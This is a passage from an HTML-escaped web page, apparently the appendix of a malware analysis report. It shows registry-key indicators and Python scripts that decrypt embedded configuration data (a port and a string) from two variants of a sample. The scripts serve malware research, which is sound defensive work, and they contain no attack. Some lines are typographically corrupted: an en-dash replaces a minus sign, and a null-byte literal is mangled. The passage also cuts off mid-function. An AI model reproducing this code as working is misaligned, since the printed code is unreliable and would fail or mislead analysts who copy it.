&lt;li&gt;&lt;code&gt;Software\Microsoft\IMEEX\&amp;lt;number&amp;gt;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Subkeys: N, A, P&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Appendix B: String Decryption Script&lt;span class="hx:absolute hx:-mt-20" id="appendix-b-string-decryption-script"&gt;&lt;/span&gt;
&lt;a href="#appendix-b-string-decryption-script" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Djibouti variant:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;struct&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;os&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;typing&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Union&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Tuple&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;sys&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;decrypt_and_store_in_buffer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;file_path&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;Union&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;Tuple&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="kc"&gt;None&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="s2"&gt;&amp;#34;&amp;#34;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; Decrypts data from an executable, validates the decrypted data, and extracts a port and string.
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; Args:
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; file_path (str): Path to the executable file containing the encrypted data.
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; Returns:
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; Union[Tuple[int, str], None]: Returns a tuple containing the port and decrypted string,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; or None if decryption fails.
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; &amp;#34;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="c1"&gt;# Open the file for reading&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;file_path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;rb&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="c1"&gt;# Move the file pointer to 108 bytes before the end&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;seek&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;108&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;SEEK_END&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="c1"&gt;# Read 108 bytes of data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;read&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;108&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nb"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;108&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="kc"&gt;None&lt;/span&gt; &lt;span class="c1"&gt;# Failed to read the correct amount of data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="c1"&gt;# Decrypt the data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;data_buffer&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;107&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;data_buffer&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;^=&lt;/span&gt; &lt;span class="n"&gt;data_buffer&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="err"&gt;–&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="c1"&gt;# XOR the first byte with 0xF0 as part of the decryption&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;data_buffer&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;^=&lt;/span&gt; &lt;span class="mh"&gt;0xF0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="c1"&gt;# Pack the first 4 bytes to check for validation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;decrypted_header&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;struct&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;unpack_from&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;lt;I&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;bytes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data_buffer&lt;/span&gt;&lt;span class="p"&gt;))[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;decrypted_header&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mh"&gt;0xFEFCFDFB&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="kc"&gt;None&lt;/span&gt; &lt;span class="c1"&gt;# Validation failed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="c1"&gt;# Extract the port from the next 4 bytes&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;port&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;struct&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;unpack_from&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;lt;I&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;bytes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data_buffer&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;)[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="c1"&gt;# Decrypted string starts at offset 8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;decrypted_string&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;bytes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data_buffer&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;8&lt;/span&gt;&lt;span class="p"&gt;:])&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;rstrip&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;b&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;x00′).decode(&amp;#39;&lt;/span&gt;&lt;span class="n"&gt;latin1&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="c1"&gt;# Decrypt the string using XOR with 0xE6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;decrypted_string&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;&amp;#34;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;chr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;ord&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;^&lt;/span&gt; &lt;span class="mh"&gt;0xE6&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;decrypted_string&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;port&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;decrypted_string&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="ne"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nb"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;Error: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="kc"&gt;None&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="s2"&gt;&amp;#34;&amp;#34;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; Main function to handle command-line arguments and execute the decryption.
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; &amp;#34;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nb"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nb"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;Usage: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt; &amp;lt;path_to_executable&amp;gt;&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;file_path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="c1"&gt;# Check if file exists&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;isfile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;file_path&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nb"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;File &amp;#39;&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;file_path&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;&amp;#39; does not exist.&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;decrypt_and_store_in_buffer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;file_path&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;port&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;decrypted_string&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nb"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;Port: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;port&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nb"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;Decrypted String: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;decrypted_string&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nb"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;Decryption failed or validation failed.&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="vm"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;__main__&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Afghan Variant&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;decode_hex_string&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hex_string&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="c1"&gt;# Convert the hex string to a byte array&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;byte_array&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;bytearray&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;fromhex&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hex_string&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="c1"&gt;# XOR each byte with 0xEC and decode to string&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;decoded_chars&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;chr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;byte&lt;/span&gt; &lt;span class="o"&gt;^&lt;/span&gt; &lt;span class="mh"&gt;0xEC&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;byte&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;byte_array&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
